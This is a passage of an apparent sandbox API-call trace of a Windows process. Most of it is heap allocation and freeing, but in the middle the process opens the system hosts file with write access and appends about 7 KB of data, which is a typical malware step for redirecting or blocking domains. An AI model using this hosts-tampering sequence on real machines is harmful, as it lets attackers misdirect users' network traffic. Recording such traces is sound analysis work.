(HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2188 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c21b0 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c21d8 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2200 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2228 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2250 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2278 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c22a0 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c22c8 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c22f0 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2318 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2340 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2368 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2390 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c23b8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c23e0 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2408 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2430 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2458 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2480 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c24a8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c24d0 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c24f8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2520 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2548 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2570 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2598 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c25c0 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2618 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x1dc3) returned 0x8c4e00 [0180.337] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c3a08 | out: hHeap=0x890000) returned 1 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2640 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2668 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2690 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c26b8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c26e0 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2708 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2730 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2758 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2780 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c27a8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c27d0 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c27f8 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2820 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2848 [0180.337] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2870 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2898 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c28c0 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c28e8 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2910 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2938 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2960 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2988 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c29b0 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c29d8 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2a00 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2a28 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2a50 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2a78 [0180.338] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2aa0 [0180.338] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bff28 | out: hHeap=0x890000) returned 1 [0180.338] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0180.343] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0180.343] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.343] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0180.343] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0180.343] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x30) returned 0x8a5500 [0180.343] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x47) returned 0x8c0110 [0180.343] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8a5500 | out: hHeap=0x890000) returned 1 [0180.343] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x6a) returned 0x8c0160 [0180.343] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0110 | out: hHeap=0x890000) returned 1 [0180.343] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x9e) returned 0x8c01d8 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0160 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xec) returned 0x8c0280 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c01d8 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x161) returned 0x8c0110 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0280 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x211) returned 0x8c0280 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0110 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x319) returned 0x8c04a0 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0280 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x4a5) returned 0x8c07c8 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c04a0 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x6f7) returned 0x8c0c78 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c07c8 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xa72) returned 0x8c0110 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0c78 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xfaa) returned 0x8c2e00 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c0110 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x17a1) returned 0x8c6bd0 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2e00 | out: hHeap=0x890000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x235f) returned 0x8c8380 [0180.344] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c6bd0 | out: hHeap=0x890000) returned 1 [0180.344] WriteFile (in: hFile=0xa0, lpBuffer=0x8c83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x8c83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0180.345] CloseHandle (hObject=0xa0) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c8380 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc118 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc140 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc168 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc190 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc1b8 | out: hHeap=0x890000) returned 1 [0180.348] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc1e0 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc208 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc230 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc258 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc280 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc2a8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc2d0 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc2f8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc320 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc348 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc370 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc398 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc3c0 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc3e8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc410 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bc438 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1618 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1640 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1668 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1690 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c16b8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c16e0 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1708 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1730 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1758 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1780 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c17a8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c17d0 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c17f8 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1820 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1848 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1870 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1898 | out: hHeap=0x890000) returned 1 [0180.349] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c18c0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c18e8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1910 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1938 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1960 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1988 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c19b0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c19d8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1a00 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1a28 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1a50 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1a78 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1aa0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1ac8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1af0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1b18 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1b40 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1b68 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1b90 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1bb8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1be0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1c08 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1c30 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1c58 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1c80 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1ca8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1cd0 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1cf8 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1d20 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1d48 | out: hHeap=0x890000) returned 1 [0180.350] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1d70 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1d98 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1dc0 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1e18 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1e40 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1e68 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1e90 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1eb8 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1ee0 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1f08 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1f30 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1f58 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1f80 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1fa8 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1fd0 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1ff8 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2020 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2048 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2070 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2098 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c20c0 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c20e8 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8a5490 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2110 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2138 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2160 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2188 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c21b0 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c21d8 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2200 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2228 | out: hHeap=0x890000) returned 1 [0180.351] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2250 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2278 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c22a0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c22c8 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c22f0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2318 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2340 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2368 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2390 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c23b8 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c23e0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2408 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2430 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2458 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2480 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c24a8 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c24d0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c24f8 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2520 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2548 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2570 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2598 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c25c0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2618 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2640 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2668 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2690 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c26b8 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c26e0 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2708 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2730 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2758 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2780 | out: hHeap=0x890000) returned 1 [0180.352] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c27a8 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c27d0 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c27f8 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2820 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2848 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2870 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2898 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c28c0 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c28e8 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2910 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2938 | out: hHeap=0x890000) returned 1 [0180.353] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2960 | out: hHeap=0x890000) 